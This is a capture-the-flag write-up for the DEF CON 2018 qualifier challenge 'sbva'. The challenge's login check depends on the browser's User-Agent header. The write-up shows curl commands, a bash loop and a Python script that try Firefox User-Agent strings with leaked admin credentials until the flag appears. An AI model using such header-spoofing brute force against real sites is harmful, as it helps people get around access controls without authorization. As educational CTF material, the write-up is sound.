DEF CON CTF Qualifier 2018 - sbva
Problem statement
We offer extensive website protection that stops attackers even when the admin's credentials are leaked! Try our demo page http://0da57cd5.quals2018.oooverflow.io with username:password admin@oooverflow.io:admin to see for yourself.

Writeup
Logging in on the login screen with admin@oooverflow.io:admin displays
Incompatible browser detected.
and the browser is redirected to http://0da57cd5.quals2018.oooverflow.io/wrongbrowser.php.
To see what else is going on, look at the raw exchange with curl.
ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v
* Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> User-Agent: curl/7.57.0
> Accept: */*
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 302 Found
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sat, 12 May 2018 11:11:52 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=luj4oovknmmia6boqqbd7bkde3; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
< Location: wrongbrowser.php
<
<html>
<style scoped>
h1 {color:red;}
p {color:blue;}
</style>
<video id="v" autoplay> </video>
<script>
if (navigator.battery.charging) {
console.log("Device is charging.")
}
</script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>
Because the Location response header is set to wrongbrowser.php, a browser redirects to wrongbrowser.php without ever rendering the page,
but the HTTP response body still contained content (curl shows it because it does not follow redirects unless -L is given).
That is suspicious. The content also uses a tag attribute and a property that one rarely sees.
style scoped
<style>: The Style Information element - HTML | MDN
Chrome supported it only between versions 19 and 35.
Firefox supports it from version 21.
navigator.battery.charging
Navigator.battery - Web APIs | MDN
According to MDN, Chrome supports it from version 38 (although it did not work in my Chrome 66).
Firefox dropped it in version 50 ([3] Removed in Firefox 50, in favor of navigator.getBattery().)
So presumably the trick is to put the User-Agent of a browser that can use both of these features into the HTTP request header. Chrome cannot satisfy both (scoped style ended in 35, battery starts at 38), but Firefox can: from 21 (scoped style) up to 49 (battery removed in 50).
Gecko user agent string reference - HTTP | MDN
Check the format of the Firefox User-Agent string there.
Then brute-force it by varying the version number in the User-Agent between 21 and 50.
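The same brute force, written as an added Python example rather than code from the original writeup. It derives the candidate Firefox range from the support windows quoted above (scoped style from 21, navigator.battery gone in 50), sends the login POST with each Firefox User-Agent, and classifies each response by status code, Location header and an OOO{...} flag pattern instead of grepping the verbose output for a string. The function names, the FEATURE_SUPPORT table and the NoRedirect handler are mine; the challenge host has long been taken down, so the network part will not return anything today, but the helpers run offline.

```python
"""Brute-force a User-Agent-gated login (DEF CON CTF Quals 2018, sbva).

Added example, not part of the original writeup. Idea: the hidden page uses
features (scoped <style>, navigator.battery) whose Firefox support windows
overlap only for a range of versions, so try a Firefox User-Agent for each
version in the overlap and look for the response that is not a redirect to
wrongbrowser.php. Needs network access to the (now dead) challenge host when
run as a script; the helper functions below work offline.
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

LOGIN_URL = "http://0da57cd5.quals2018.oooverflow.io/login.php"
CREDS = {"username": "admin@oooverflow.io", "password": "admin"}
FLAG_RE = re.compile(r"OOO\{[^}]+\}")

# Firefox support windows as (first supported, last supported); None = no bound.
# Numbers are the ones quoted from MDN in the writeup (assumed correct here).
FEATURE_SUPPORT = {
    "style scoped": (21, None),
    "navigator.battery": (None, 49),  # removed in Firefox 50
}


def candidate_versions(support, lo=1, hi=100):
    """Versions in [lo, hi] for which every listed feature is supported."""
    for first, last in support.values():
        if first is not None:
            lo = max(lo, first)
        if last is not None:
            hi = min(hi, last)
    return list(range(lo, hi + 1))  # empty if the windows do not overlap


def firefox_ua(version):
    """Desktop Firefox UA string in the shape given by the MDN Gecko UA reference."""
    return (f"Mozilla/5.0 (Windows NT 6.1; rv:{version}.0) "
            f"Gecko/20100101 Firefox/{version}.0")


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: we want to see the redirect itself, like curl without -L."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify(status, headers, body):
    """Interpret one login response.

    Returns ("redirect", location) for a 3xx with a Location header,
    ("flag", flag) when the body contains an OOO{...} flag, else ("other", status).
    """
    hdrs = {k.lower(): v for k, v in headers.items()}
    location = hdrs.get("location", "")
    if 300 <= status < 400 and location:
        return ("redirect", location)
    m = FLAG_RE.search(body)
    if m:
        return ("flag", m.group(0))
    return ("other", status)


def try_login(ua, url=LOGIN_URL, creds=CREDS, timeout=10):
    """POST the leaked credentials with the given User-Agent and classify the reply."""
    data = urllib.parse.urlencode(creds).encode()
    req = urllib.request.Request(url, data=data, headers={"User-Agent": ua})
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return classify(resp.status, dict(resp.headers),
                            resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        # With redirects disabled, urllib surfaces 3xx (and 4xx/5xx) as HTTPError.
        return classify(e.code, dict(e.headers), e.read().decode(errors="replace"))


def main():
    for ver in candidate_versions(FEATURE_SUPPORT):
        kind, detail = try_login(firefox_ua(ver))
        print(f"Firefox/{ver}: {kind} {detail}")
        if kind == "flag":
            return 0
    return 1


if __name__ == "__main__":
    sys.exit(main())
```

Checking the status code and Location header is more robust than grepping for wrongbrowser.php, since a 200 page could mention that filename in a link without being a redirect; the flag regex also means the script stops on the first hit instead of making you eyeball thirty verbose curl dumps.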
ctfuser@kali:sbva$ cat try_FF.sh
#!/bin/bash
# Try every Firefox major version from 21 to 50 as the User-Agent and
# print, for each one, whether the login still redirects to wrongbrowser.php.
for VER in `seq 21 50`
do
  UA="Mozilla/5.0 (Windows NT 6.1; rv:$VER.0) Gecko/20100101 Firefox/$VER.0"
  echo $UA
  curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: $UA" 2>&1 | grep wrongbrowser.php
done
ctfuser@kali:sbva$ ./try_FF.sh
Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
< Location: wrongbrowser.php
Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0
< Location: wrongbrowser.php
Only Firefox/42 does not come back with Location: wrongbrowser.php.
Running that single User-Agent on its own with curl, the flag came back in the 200 response body: the "protection" is nothing more than a server-side check of the User-Agent request header.
ctfuser@kali:sbva$ curl http://0da57cd5.quals2018.oooverflow.io/login.php -d "username=admin@oooverflow.io&password=admin" -v -H "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0"
* Trying 13.56.115.190...
* TCP_NODELAY set
* Connected to 0da57cd5.quals2018.oooverflow.io (13.56.115.190) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: 0da57cd5.quals2018.oooverflow.io
> Accept: */*
> User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
> Content-Length: 43
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 43 out of 43 bytes
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Date: Sun, 13 May 2018 06:12:36 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< Set-Cookie: PHPSESSID=2kocc3ljm9njjsoediqasm6af6; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Content-Security-Policy: upgrade-insecure-requests
<
OOO{0ld@dm1nbr0wser1sth30nlyw@y}
<html>
<style scoped>
h1 {color:red;}
p {color:blue;}
</style>
<video id="v" autoplay> </video>
<script>
if (navigator.battery.charging) {
console.log("Device is charging.")
}
</script>
* Connection #0 to host 0da57cd5.quals2018.oooverflow.io left intact
</html>